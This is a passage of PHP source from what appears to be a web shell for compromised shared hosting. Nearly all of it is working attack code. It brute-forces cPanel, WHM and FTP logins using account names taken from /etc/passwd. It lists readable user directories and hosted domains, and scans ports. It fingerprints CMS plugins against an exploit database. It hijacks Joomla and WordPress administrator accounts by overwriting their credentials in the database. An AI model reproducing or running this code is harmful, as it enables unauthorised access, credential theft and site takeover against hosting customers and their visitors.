  1132.                         <td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?>
  1133.                         </td>
  1134.                     </tr>
  1135.                 </table>
  1136.             </form>
  1137.             <?php
  1138.             }
  1139.         elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
  1140.             {  
  1141.             ?>
  1142.                 <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  1143.             <?php
  1144.            
  1145.             if($win){
  1146.                 echo "<br><br><center><h2>Not Available for Windows Server</h2></center>";
  1147.             } else {
  1148.  
  1149.             //bruteforce
  1150.             @ini_set('memory_limit', 999999999999);
  1151.             $connect_timeout=5;
  1152.             @set_time_limit(0);
  1153.             $pokeng     = $_REQUEST['submit'];
  1154.             $hn         = $_REQUEST['users'];
  1155.             $crew       = $_REQUEST['passwords'];
  1156.             $pasti      = $_REQUEST['sasaran'];
  1157.             $manualtarget   = $_REQUEST['target'];
  1158.             $bisa       = $_REQUEST['option'];
  1159.             if($pasti == ''){
  1160.                 $pasti = 'localhost';
  1161.             }
  1162.             if($manualtarget == ''){
  1163.                 $manualtarget = 'http://localhost:2082';
  1164.             }
  1165.  
  1166. function get_users()
  1167. {
  1168.     $users = array();
  1169.     $rows=file('/etc/passwd');
  1170.     if(!$rows) return 0;   
  1171.     foreach ($rows as $string)
  1172.     {
  1173.         $user = @explode(":",$string);
  1174.         if(substr($string,0,1)!='#') array_push($users,$user[0]);
  1175.     }
  1176.     return $users;
  1177. }
  1178.  
  1179. if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
  1180. else
  1181.     {
  1182.     print " <div align='center'>
  1183.         <form method='post' style='border: 1px solid #000000'><br><br>
  1184.         <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1>
  1185.             <tr>
  1186.                 <td>
  1187.                     <b> Target ! : </font><input type='text' name='sasaran' size='16' value= $pasti class='inputz'></p></font></b></p>
  1188.                     <div align='center'><br>
  1189.                     <TABLE style='BORDER-COLLAPSE: collapse'
  1190.                         cellSpacing=0
  1191.                         borderColorDark=#666666
  1192.                         cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  1193.                         <tr> <td align='center'> <b>User</b></td> <td> <p align='center'> <b>Pass</b></td>
  1194.                         </tr>
  1195.                     </table>
  1196.                     <p align='center'>
  1197.                     <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  1198.     foreach($users as $user) { echo $user."\n"; }
  1199.     print"</textarea>
  1200.         <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
  1201.         <br>
  1202.         <b>Sila pilih : </span><input name='option' value='manual' style='font-weight: 700;' type='radio'> Manual Target Brute : <input type='text' name='target' size='16' class='inputz' value= $manualtarget ><br />
  1203.         <input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  1204.         <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp
  1205.         <input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==> <input type='submit' value='Brute !' name='submit' class='inputzbut'></p>
  1206.         </td></tr></table></td></tr></form><p align= 'left'>";
  1207.     }
  1208. ?>
  1209. <?php
  1210.  
  1211. function manual_check($anjink,$asu,$babi,$lonte){
  1212.     $ch = curl_init();
  1213.     curl_setopt($ch, CURLOPT_URL, "$anjink");
  1214.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1215.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1216.     curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1217.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1218.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1219.     $data = curl_exec($ch);
  1220.     if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1221.     elseif ( curl_errno($ch) == 0 ){
  1222.         print "<b>[ Newbie3viLc063s0@email ]# </b> <b>Completed , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1223.         }
  1224.     curl_close($ch);
  1225. }
  1226.  
  1227.  
  1228. function ftp_check($link,$user,$pswd,$timeout){
  1229.     $ch = curl_init();
  1230.     curl_setopt($ch, CURLOPT_URL, "ftp://$link");
  1231.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1232.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1233.     curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1234.     curl_setopt($ch, CURLOPT_USERPWD, "$user:$pswd");
  1235.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1236.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1237.     $data = curl_exec($ch);
  1238.     if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit; }
  1239.     elseif ( curl_errno($ch) == 0 ){
  1240.         print "<b>serangan selesai , username = <font color='#FF0000'> $user </font> dan passwordnya = <font color='#FF0000'> $pswd </font></b><br>";
  1241.         }
  1242.     curl_close($ch);
  1243. }
  1244.  
  1245. function cpanel_check($anjink,$asu,$babi,$lonte){
  1246.     $ch = curl_init();
  1247.     curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");
  1248.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1249.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1250.     curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1251.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1252.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1253.     $data = curl_exec($ch);
  1254.     if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1255.     elseif ( curl_errno($ch) == 0 ){
  1256.         print "<b>[ Newbie3viLc063s@email ]# </b> <b>Completed, Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1257.         }
  1258.     curl_close($ch);
  1259. }
  1260.  
  1261. function whm_check($anjink,$asu,$babi,$lonte){
  1262.     $ch = curl_init();
  1263.     curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");
  1264.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1265.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1266.     curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1267.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1268.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1269.     $data = curl_exec($ch);
  1270.     if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1271.     elseif ( curl_errno($ch) == 0 )
  1272.         {
  1273.         print "<b>[ " . TITLE . " ]# </b> <b>Selesai , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1274.         }
  1275.     curl_close($ch);
  1276. }
  1277.    
  1278. if(isset($pokeng) && !empty($pokeng))
  1279.     {
  1280.     $userlist = explode ("\n" , $hn );
  1281.     $passlist = explode ("\n" , $crew );
  1282.     print "<b>[ " . TITLE . "  ]# </b> ATTACK...!!! </font></b><br>";
  1283.     foreach ($userlist as $asu)
  1284.         {
  1285.         $_user = trim($asu);
  1286.         foreach ($passlist as $babi )
  1287.             {
  1288.             $_pass = trim($babi);
  1289.             if ($bisa == "manual")
  1290.                 { manual_check($manualtarget,$_user,$_pass,$lonte); }
  1291.             if($bisa == "ftp")
  1292.                 { ftp_check($pasti,$_user,$_pass,$lonte); }
  1293.             if ($bisa == "cpanel")
  1294.                 { cpanel_check($pasti,$_user,$_pass,$lonte); }
  1295.             if ($bisa == "whm")
  1296.                 { whm_check($pasti,$_user,$_pass,$lonte); }
  1297.             }
  1298.         }
  1299.     }
  1300. }
  1301.             }
  1302.  
  1303. //bruteforce
  1304.  
  1305. elseif(isset($_GET['x']) && ($_GET['x'] == 'readable'))
  1306.     {  
  1307.     ?>
  1308.     <form action="?y=<?php echo $pwd; ?>&amp;x=readable" method="post">
  1309.     <?php
  1310.    
  1311.     if($win){
  1312.         echo "<br><br><center><h2>Not Available for Windows Server</h2></center>";
  1313.     } else {
  1314.  
  1315.     //readable public_html
  1316.     echo '<html><head><title>Newbie3viLc063s Cpanel Finder</title></head><body>';
  1317.     ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1318.     set_time_limit(0);
  1319.     ###################
  1320.     @$passwd = fopen('/etc/passwd','r');
  1321.     if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1322.     $pub = array();
  1323.     $users = array();
  1324.     $conf = array();
  1325.     $i = 0;
  1326.     while(!feof($passwd))
  1327.     {
  1328.         $str = fgets($passwd);
  1329.         if ($i > 35)
  1330.             {
  1331.             $pos = strpos($str,':');
  1332.             $username = substr($str,0,$pos);
  1333.             $dirz = '/home/'.$username.'/public_html/';
  1334.             if (($username != ''))
  1335.                 {
  1336.                 if (is_readable($dirz))
  1337.                     {
  1338.                     array_push($users,$username);
  1339.                     array_push($pub,$dirz);
  1340.                     }
  1341.                 }
  1342.             }
  1343.         $i++;
  1344.     }
  1345.    
  1346.     ###################
  1347.     echo '<br><br>';
  1348.     echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  1349.     echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br />";
  1350.     echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
  1351.     foreach ($users as $user)
  1352.         {
  1353.         $path = "/home/$user/public_html/";
  1354.         echo "<a href='?y&#61;$path' target='_blank' style='text-shadow:0px 0px 10px #12E12E; font-weight:bold; color:#FF0000;'>$path</a><br>";
  1355.         }
  1356.     echo "<br><br><br>";
  1357.     echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n"."<br />";
  1358.     echo "[+] Complete...\n"."<br />";
  1359.     echo '<br><br></b>
  1360.     </body>
  1361.     </html>';
  1362.    
  1363.     }
  1364.     }
  1365.  
  1366.    
  1367. elseif(isset($_GET['x']) && ($_GET['x'] == 'localdomain'))
  1368.     {  
  1369.     ?>
  1370.     <form action="?y=<?php echo $pwd; ?>&amp;x=localdomain" method="post">
  1371.     <?php
  1372.    
  1373.     if($win){
  1374.         echo "<br><br><center><h2>Not Available for Windows Server</h2></center>";
  1375.     } else {
  1376.  
  1377.     //readable public_html
  1378.    
  1379.     echo "<br><br>";
  1380.     $file = @implode(@file("/etc/named.conf"));
  1381.     if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  1382.     preg_match_all("#named/(.*?).db#",$file ,$r);
  1383.     $domains = array_unique($r[1]);
  1384.    
  1385.     function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  1386.    
  1387.     check();
  1388.    
  1389.     echo "<table align=center border=1 class='tabnet' width=59% cellpadding=5>
  1390.              <tr><th colspan=2>[+] Here We Have : [<font face=calibri size=4 style=color:#FF0000>".count($domains)."</font>] Listed Domains In localhost.</th></tr>
  1391.              <tr>
  1392.              <td><b>List Of Users</b></td>
  1393.              <td><b><font style=color:#0015FF;>List Of Domains</b></td>
  1394.              </tr>";
  1395.    
  1396.     foreach($domains as $domain)
  1397.            {
  1398.            $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1399.            echo "<tr>
  1400.            <td><a href='http://www.$domain' target='_blank' style='text-shadow:0px 0px 10px #CC2D4B; font-weight:bold; color:#FF002F;'>$domain</a></td>
  1401.            <td>".$user['name']."</td>
  1402.            </tr>";
  1403.            }
  1404.    
  1405.     echo "</table>";
  1406.     //radable public_html
  1407.     }
  1408.     }
  1409.    
  1410. elseif(isset($_GET['x']) && ($_GET['x'] == 'port-scanner'))
  1411. {  
  1412. ?>
  1413. <form action="?y=<?php echo $pwd; ?>&amp;x=port-scanner" method="post">
  1414.  <?php
  1415.  
  1416. echo '<br><br><center><br><b>Port Scanner</b><br>';
  1417. $start = strip_tags($_POST['start']);
  1418. $end = strip_tags($_POST['end']);
  1419. $host = strip_tags($_POST['host']);
  1420.  
  1421. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  1422. for($i = $start; $i<=$end; $i++){
  1423.         $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1424.         if($fp){
  1425.                 echo "Port <font style='color:#DE3E3E'>$i</font> is <font style='color:#64CF40'>open</font><br>";
  1426.         }
  1427.         flush();
  1428.         }
  1429. }else{
  1430.  
  1431. echo '
  1432. <input type="hidden" name="y" value="phptools">
  1433. Host:<br />
  1434. <input type="text" class="inputz" name="host" value="localhost"/><br />
  1435. Port start:<br />
  1436. <input type="text" class="inputz" name="start" value="0"/><br />
  1437. Port end:<br />
  1438. <input type="text" class="inputz" name="end" value="5000"/><br />
  1439. <input type="submit" class="inputzbut" value="Scan Ports" />
  1440. </form></center>';
  1441. }
  1442. }
  1443.    
  1444. elseif(isset($_GET['x']) && ($_GET['x'] == 'string-encode'))
  1445. {  
  1446. ?>
  1447. <form action="?y=<?php echo $pwd; ?>&amp;x=string-encode" method="post">
  1448. <?php
  1449.  
  1450. /*
  1451.   Simple STRING TO HASH
  1452.   Code by Altenator IWnet
  1453. */
  1454.  
  1455. ?>
  1456.  
  1457. <br><br>
  1458. <form method='post'>
  1459. <table class="tabnet">
  1460. <tbody>
  1461. <tr>
  1462. <th colspan="2"> String to Hash </th>
  1463. </tr>
  1464. <tr>
  1465. <td>String : </td>
  1466. <td><input type='text' class='inputz' name='hash_input' value='<? if(isset($_POST['hash_input'])){echo $_POST['hash_input'];}?>' /></td>
  1467. </tr>
  1468. <tr>
  1469. <td align="center" colspan="2"><input type='submit' name='submit_hash' style="width:100%;" class='inputzbut' value='Encode' /></td>
  1470. </tr>
  1471. </tbody>
  1472. </table>
  1473. </form>
  1474. <br><br>
  1475.  
  1476. <?
  1477.  
  1478. if (isset($_POST['submit_hash'])) {
  1479.     if (isset($_POST['hash_input'])) {
  1480.         $hash_input = $_POST['hash_input'];
  1481.         }
  1482.  
  1483. if ($hash_input=="") {  // show error if nothing inserted in input box
  1484.     echo 'Nothing Inserted!';
  1485. } else {
  1486.     if (isset($hash_input)) {
  1487.         echo "<table class='tabnet'><tbody><tr><th colspan='2'> Hash </th></tr>";
  1488.         foreach (hash_algos() as $hash_setoption) {    // set to use all hash function
  1489.             $calculate_hash = hash($hash_setoption, $hash_input, false); // calculate all hash and declare variable
  1490.             echo "<tr><td width='70' align='center'><font style='color:#9F7CEB'>$hash_setoption</font></td><td><font style='color:#5BC740'>$calculate_hash</font></td></tr>";   // output
  1491.         }
  1492.         echo "</tbody></table>";
  1493.     }
  1494. }
  1495. }
  1496. }
  1497.  
  1498. elseif(isset($_GET['x']) && ($_GET['x'] == 'cms-scanner'))
  1499. {
  1500. ?>
  1501. <form action="?y=<?php echo $pwd; ?>&amp;x=cms-scanner" method="post">
  1502.  
  1503. <p align="center">&nbsp;</p>
  1504. <p align="center"><font size="4">1337 Multiple CMS Scaner Online v0.4 (0!IIIV) | T0olKit By : KedAns-Dz </font></p><br><p align="center"><font size="4">( Modified by AltenatorIWnet )</font></p><br>
  1505. <form method="POST">
  1506. <p align="center">
  1507. <input type="text" class="inputz" name="site" size="65" value="<?php if(isset($_GET['site'])){ echo $_GET['site']; } ?>">
  1508. <select name="options" class="inputz">
  1509. <option value="single">This Site Only</option>
  1510. <option value="multi">Whole Server</option>
  1511. </select>
  1512. <input type="submit" class="inputzbut" value="Scan..">
  1513. </p>
  1514. </form>
  1515. <center>
  1516. <?php
  1517. @set_time_limit(0);
  1518. @error_reporting(0);
  1519.  
  1520. /* Use Curl to replace file_get_contents */
  1521. function getdata($url){
  1522.     if(in_array('curl', get_loaded_extensions())){
  1523.         $ch = curl_init($url);
  1524.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1525.         $data = curl_exec ($ch);
  1526.         curl_close ($ch);
  1527.         return $data;
  1528.     }else{
  1529.         return file_get_contents($url);
  1530.     }
  1531. }
  1532.  
  1533. /* Check Exploit At Exploit-DB */
  1534. function check_exploit($cpmxx){
  1535.     $link = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=&filter_exploit_text=".$cpmxx."&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  1536.     $result = @getdata("$link");
  1537.     if (strpos($result, "No results") != FALSE){
  1538.         echo"<td>Not Found</td><td><a href='http://www.google.com/#hl=en&q=download+$cpmxx'>Download</a></td></tr>";
  1539.     }else{
  1540.         echo"<td><a href='$link'>Found</a></td><td><=</td></tr>";
  1541.     }
  1542. }
  1543.  
  1544.  
  1545. /* Joomla Conf */
  1546. function check_com($url){
  1547.     $source = @getdata("http://$url/");
  1548.     preg_match_all('{option,(.*?)/}i',$source,$f);
  1549.     preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  1550.     preg_match_all('{/components/(.*?)/}i',$source,$f3);
  1551.     $arz=array_merge($f2[1],$f[1],$f3[1]);
  1552.     $coms=array();
  1553.     if(count($arz)==0){ echo "<tr><td colspan=3>[ Joomla ] ...Nothing Found !</td></tr>";}
  1554.     foreach(array_unique($arz) as $x){
  1555.         $coms[]=$x;
  1556.     }
  1557.     foreach($coms as $comm){
  1558.         if(strlen($comm) < 40) {
  1559.             echo "<tr><td>$comm</td>";
  1560.             check_exploit($comm);
  1561.         }
  1562.     }
  1563. }
  1564.  
  1565. /* WordPress Conf */
  1566. function get_plugins($url){
  1567.     $source = @getdata("http://$url/");
  1568.     preg_match_all("#/plugins/(.*?)/#i", $source, $f);
  1569.     $arz=array_unique($f[1]);
  1570.     if(count($arz)==0){
  1571.         echo "<tr><td colspan=3>[ Wordpress ] ...Nothing Found !</td></tr>";
  1572.     }
  1573.     foreach($arz as $plugin){
  1574.         if(strlen($plugin) < 40) {
  1575.             echo "<tr><td>$plugin</td>";
  1576.             check_exploit($plugin);
  1577.         }
  1578.     }
  1579. }
  1580.  
  1581. /* Nuke's Conf
  1582. function get_numod($url){
  1583.     $source = @getdata("http://$url/");
  1584.     preg_match_all('{?name=(.*?)/}i',$source,$f);
  1585.     preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i',$source,$f2);
  1586.     preg_match_all('{/modules/(.*?)/}i',$source,$f3);
  1587.     $arz=array_merge($f2[1],$f[1],$f3[1]);
  1588.     $cpm=array();
  1589.     if(count($arz)==0){
  1590.         echo "<tr><td colspan=3>[ Nuke's ] ...Nothing Found !</td></tr>";
  1591.     }
  1592.     foreach(array_unique($arz) as $x){
  1593.         $cpm[]=$x;
  1594.     }
  1595.     foreach($cpm as $nmod){
  1596.         if(strlen($nmod) < 40) {
  1597.             echo "<tr><td>$nmod</td>";
  1598.             check_exploit($nmod);
  1599.         }
  1600.     }
  1601. }*/
  1602.  
  1603. /* Xoops Conf */
  1604. function get_xoomod($url){
  1605.     $source = @getdata("http://$url/");
  1606.     preg_match_all('{/modules/(.*?)/}i',$source,$f);
  1607.     $arz=array_merge($f[1]);
  1608.     $cpm=array();
  1609.     if(count($arz)==0){
  1610.         echo "<tr><td colspan=3>[ Xoops ] ...Nothing Found !</td></tr>";
  1611.     }
  1612.     foreach(array_unique($arz) as $x){
  1613.         $cpm[]=$x;
  1614.     }
  1615.     foreach($cpm as $xmod){
  1616.         if(strlen($xmod) < 40) {
  1617.             echo "<tr><td>$xmod</td>";
  1618.             check_exploit($xmod);
  1619.         }
  1620.     }
  1621. }
  1622.  
  1623. /**************************************************************/
  1624.  
  1625. if(!isset($_POST['site'])) { credit();die(); }
  1626.  
  1627. function findit($mytext,$starttag,$endtag) {
  1628.     $posLeft  = @stripos($mytext,$starttag)+strlen($starttag);
  1629.     $posRight = @stripos($mytext,$endtag,$posLeft+1);
  1630.     return  @substr($mytext,$posLeft,$posRight-$posLeft);
  1631.     flush();
  1632. }
  1633.  
  1634. function CleanAndClear($site) {
  1635.     $output = strtolower($site);
  1636.     $aaa = array("http:" ,"//");
  1637.     foreach($aaa as $aa1) {
  1638.         $output = (str_replace("$aa1", "", $output));
  1639.     }
  1640.     return $output;
  1641. }
  1642.  
  1643. function reverse_ip($site){
  1644.     $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  1645.     $ipss    = @findit($getip,'<pre>','</pre>');
  1646.     return $ipss;
  1647.     flush();
  1648. }
  1649.  
  1650. function clean_array($site){
  1651.     $ipp = "<b>".gethostbyname(CleanAndClear($site))."</b>";
  1652.     $reverse = reverse_ip(CleanAndClear($site));
  1653.     $clean_string = CleanAndClear(str_replace("\n", " ", str_replace("Domains on $ipp: ", "", $reverse)));
  1654.     $clean_array = array_filter(explode(" ", trim(str_replace("  ","",$clean_string))));
  1655.     return $clean_array;
  1656. }
  1657.  
  1658. if($_POST['options'] == "single") {
  1659.     $start_array = array(CleanAndClear($_POST['site']));
  1660. } else {
  1661.     $start_array = clean_array($_POST['site']);
  1662. }
  1663.            
  1664. echo'<table border="1"  width=\"80%\" align=\"center\">
  1665. <tr><td width=\"30%\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>'.gethostbyname(CleanAndClear($_POST['site'])).'</b></td></tr>        
  1666. <tr><td width=\"30%\"><b>Sites Found&nbsp; : </b></td><td><b>'.count($start_array).'</b></td></tr>
  1667. </table>';
  1668.  
  1669. echo "<br><br>";
  1670. echo'<table border="1" width="80%" align=\"center\">';
  1671.  
  1672. foreach($start_array as $h3h3){
  1673.     echo'<tr id=new><td><b><a href=http://'.$h3h3.'/>'.$h3h3.'</a></b></td><td><b>Exploit-DB</b></td><td><b>Challenge of Exploiting ..!</b></td></tr>';
  1674.     check_com($h3h3);
  1675.     get_plugins($h3h3);
  1676.     /*get_numod($h3h3);*/
  1677.     get_xoomod($h3h3);
  1678. }
  1679.  
  1680. echo"</table>";
  1681.  
  1682. function credit(){
  1683.     echo "</center>
  1684.     <br><p align='center'>
  1685.     Coded By : <a href='http://facebook.com/KedAns'>KedAns-Dz</a> | Modified by <b>AltenatorIWnet</b> | <a href='http://1337day.com/'>Inj3ct0r 1337day Exploit Database</a><br>
  1686.     Made in Algeria | CopyCenter (^.^) 2o12
  1687.     </p>
  1688.     </body>
  1689.     </html>";
  1690. }
  1691. }
  1692.  
  1693.  
  1694. elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset'))
  1695. {
  1696. ?>
  1697. <form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">
  1698.  
  1699. <?php
  1700.  
  1701. @error_reporting(0);
  1702. @ini_set('error_log',NULL);
  1703. echo '
  1704. <div class="com">
  1705. <form method="post">
  1706. <center><br><br><table class="tabnet" border="1" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
  1707. <br />
  1708. <tr>
  1709.     <td>Host :</td>
  1710.     <td><input type="text" class="inputz" name="host" value="localhost" /></td>
  1711. </tr>
  1712. <tr>
  1713.     <td>user :</td>
  1714.     <td><input type="text" class="inputz" name="user" /></td>
  1715. </tr>
  1716. <tr>
  1717.     <td>Pass :</td><td><input class="inputz" type="text" name="pass"/></td>
  1718. </tr>
  1719. <tr>
  1720.     <td>db :</td>
  1721.     <td><input type="text" class="inputz" name="db" /></td>
  1722. </tr>
  1723. <tr>
  1724.     <td>dbprefix :</td>
  1725.     <td><input type="text" class="inputz" name="jop" value="jos_users" /></td>
  1726. </tr>
  1727. <tr>
  1728.     <td>Admin User :</td>
  1729.     <td><input type="text" class="inputz" name="users" value="useradmin" /></td>
  1730. </tr>
  1731. <tr>
  1732.     <td>Admin Password :</td>
  1733.     <td><input type="text" class="inputz" name="passwd" value="passadmin" /></td>
  1734. </tr>
  1735. <tr>
  1736.      <td colspan="6" align="center" width="70%">
  1737.         <input type="submit" value="SQL" class="inputzbut" maxlength="30" />
  1738.         <input type="reset" value="clear" class="inputzbut" maxlength="30" /> </td>
  1739.  
  1740. </tr>
  1741.  </table>
  1742. </form> </div></center>';
  1743.  
  1744. $host   = $_POST['host'];
  1745. $user   = $_POST['user'];
  1746. $pass   = $_POST['pass'];
  1747. $db     = $_POST['db'];
  1748. $jop    = $_POST['jop'];
  1749. $users   = $_POST['users'];
  1750. $admpas = $_POST['passwd'];
  1751.  
  1752. function joomlahash($password) {
  1753.     $random = rand();
  1754.     $string = md5("$random");
  1755.     $yourpassword = "$password";
  1756.     $random32 = "$string";
  1757.     $join = "$password$random32";
  1758.     $md5 = md5("$join");
  1759.     $joomlahash = "$md5:$random32";
  1760.     return $joomlahash;
  1761. }
  1762.  
  1763. if(isset($host) ) {
  1764. $con =@ mysql_connect($host,$user,$pass) or die ;
  1765. $cond =@ mysql_select_db($db) or die;
  1766.  
  1767. $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = Super Administrator");
  1768. $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = Super Administrator");
  1769. $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = deprecated");
  1770. $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = deprecated");
  1771.  
  1772. }else{
  1773.   echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
  1774. }
  1775. }
  1776.    
  1777. elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset'))
  1778. {  
  1779. ?>
  1780. <form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">
  1781.  
  1782. <?php
  1783.  
  1784. @error_reporting(0);
  1785. @ini_set('error_log',NULL);
  1786.   echo '
  1787. <div class="com">
  1788. <form method="post">
  1789. <center><br><br><table border="1" class="tabnet" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
  1790. <br />
  1791.  
  1792. <tr>
  1793.     <td>Host :</td>
  1794.     <td><input type="text" name="host" class="inputz" value="localhost" /></td>
  1795. </tr>
  1796.  
  1797. <tr>
  1798.     <td>user :</td>
  1799.     <td><input type="text" class="inputz" name="user" /></td>
  1800. </tr>
  1801. <tr>
  1802.     <td>Pass :</td><td><input type="text" class="inputz" name="pass"/></td>
  1803. </tr>
  1804. <tr>
  1805.     <td>db :</td>
  1806.     <td><input type="text" class="inputz" name="db" /></td>
  1807. </tr>
  1808. <tr>
  1809.     <td>user admin :</td>
  1810.     <td><input type="text" class="inputz" name="useradmin" value="admin" /></td>
  1811. </tr>
  1812. <tr>
  1813.     <td>pass admin :</td>
  1814.     <td><input type="text" class="inputz" name="passadmin" value="admin"/></td>
  1815. </tr>
  1816. <tr>
  1817.      <td colspan="6" align="center" width="70%"> <input type="submit" class="inputzbut" value="SQL" maxlength="30" />  <input type="reset" value="clear" class="inputzbut" maxlength="30" /> </td>
  1818.  
  1819. </tr>
  1820.  </table>
  1821. </form> </div></center>';
  1822.  
  1823. $host       = $_POST['host'];
  1824. $user       = $_POST['user'];
  1825. $pass       = $_POST['pass'];
  1826. $db         = $_POST['db'];
  1827. $useradmin  = $_POST['useradmin'];
  1828. $pass_ad    = $_POST['passadmin'];
  1829.  
  1830. if(isset($host) ) {
  1831. $con =@ mysql_connect($host,$user,$pass) or die ;
  1832. $sedb =@ mysql_select_db($db) or die;
  1833. $crypt = crypt($pass_ad);
  1834. $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$useradmin."' WHERE ID = 1") or die('Cant Update ID Number 1');
  1835. $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die('Cant Update ID Number 1');
  1836. if ($query)
  1837. {
  1838.   echo "<center><br /><div class='com'>Queried !<br /><br /></div></center>";
  1839. }
  1840. else if (!$query)
  1841. {
  1842.   echo "error";
  1843. }
  1844.  
  1845. }else
  1846. {
  1847.   echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
  1848. }
  1849. }
  1850.    
  1851.    
  1852. elseif(isset($_GET['x']) && ($_GET['x'] == 'web-info'))
  1853. {  
  1854. ?>
  1855. <form action="?y=<?php echo $pwd; ?>&amp;x=web-info" method="post">
  1856.  
  1857.  
  1858. <?php
  1859.  
  1860. function sws_domain_info($site)
  1861. {
  1862. $getip = @file_get_contents("http://networktools.nl/whois/$site");
  1863. flush();
  1864. $ip    = @findit($getip,'<pre>','</pre>');
  1865.  
  1866. return $ip;
  1867. flush();
  1868. }
  1869.  
  1870.  
  1871. function sws_net_info($site)
  1872. {
  1873. $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  1874. $ip    = @findit($getip,'<pre>','</pre>');
  1875.  
  1876. return $ip;
  1877. flush();
  1878. }
  1879.  
  1880. function sws_site_ser($site)
  1881. {
  1882. $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  1883. $ip    = @findit($getip,'<pre>','</pre>');
  1884.  
  1885. return $ip;
  1886. flush();
  1887. }
  1888.  
  1889. function sws_sup_dom($site)
  1890. {
  1891. $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  1892. $ip    = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  1893.  
  1894. return $ip;
  1895. flush();
  1896. }
  1897.  
  1898. function susun_info($function){
  1899.     $atur = explode("\n", $function);
  1900.     foreach(array_unique($atur) as $aturkan){echo $aturkan."<br>";}
  1901. }
